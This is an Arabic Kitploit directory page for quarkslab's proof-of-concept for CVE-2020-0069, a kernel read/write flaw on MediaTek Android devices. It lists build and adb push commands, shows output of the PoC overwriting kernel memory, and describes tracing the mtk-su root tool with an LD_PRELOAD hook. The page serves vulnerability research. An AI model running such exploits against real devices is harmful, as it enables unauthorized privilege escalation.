Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-0069_poc — إثبات مفهوم لاستغلال CVE-2020-0069 على أجهزة أندرويد من ميدياتك، مما يتيح قراءة/كتابة ذاكرة النواة وربط استدعاءات النظام لتصعيد الامتيازات. | Kitploit
أدوات/GitHubGitHub/quarkslab/cve-2020-0069_poc
أمان أندرويدتصعيد الامتيازاتالاستغلالأمن الجوالاستغلال الملفات الثنائية
GitHubquarkslab/cve-2020-0069_poc

CVE-2020-0069_poc

إثبات مفهوم لاستغلال CVE-2020-0069 على أجهزة أندرويد من ميدياتك، مما يتيح قراءة/كتابة ذاكرة النواة وربط استدعاءات النظام لتصعيد الامتيازات.

عرض المستودع
109263منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

يحتوي هذا المستودع على المواد التي استخدمناها للتحقيق في CVE-2020-0069 على جهاز Xiaomi Redmi 6a (بمعالج Mediatek SoC MT6762M).

هناك ثلاثة برامج:

  • kernel_rw.c برنامج بلغة C يسمح بقراءة/كتابة ذاكرة النواة
  • poc.sh سكربت شل
  • syscall_hook.c مكتبة بلغة C يمكن استخدامها لتتبع البرنامج mtk-su (مُختبَرة على الإصدار 19)

البناء

لبناء الملفات الثنائية:

root@kitploit:~
$ ndk-build

ثم ادفعها إلى الجهاز:

root@kitploit:~
$ adb push poc.sh /data/local/tmp
$ adb push libs/armeabi-v7a/kernel_rw /data/local/tmp
$ adb push libs/armeabi-v7a/libsyscall_hook.so /data/local/tmp

الاستخدام

إثبات الفكرة (PoC) لـ CVE-2020-0069

root@kitploit:~
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

لتتبّع mtk-su

root@kitploit:~
$ mkdir mtk-su
$ LD_PRELOAD=./syscall_hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x53df4000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
exec command (num 2) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-2
[...]
$ cat  mtksu/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40a68000 into reg 17
READ  address reg 17, data reg b
MOVE startPA+0 into reg 17
WRITE  address reg 17, data reg b
[...]
تنزيل الأداة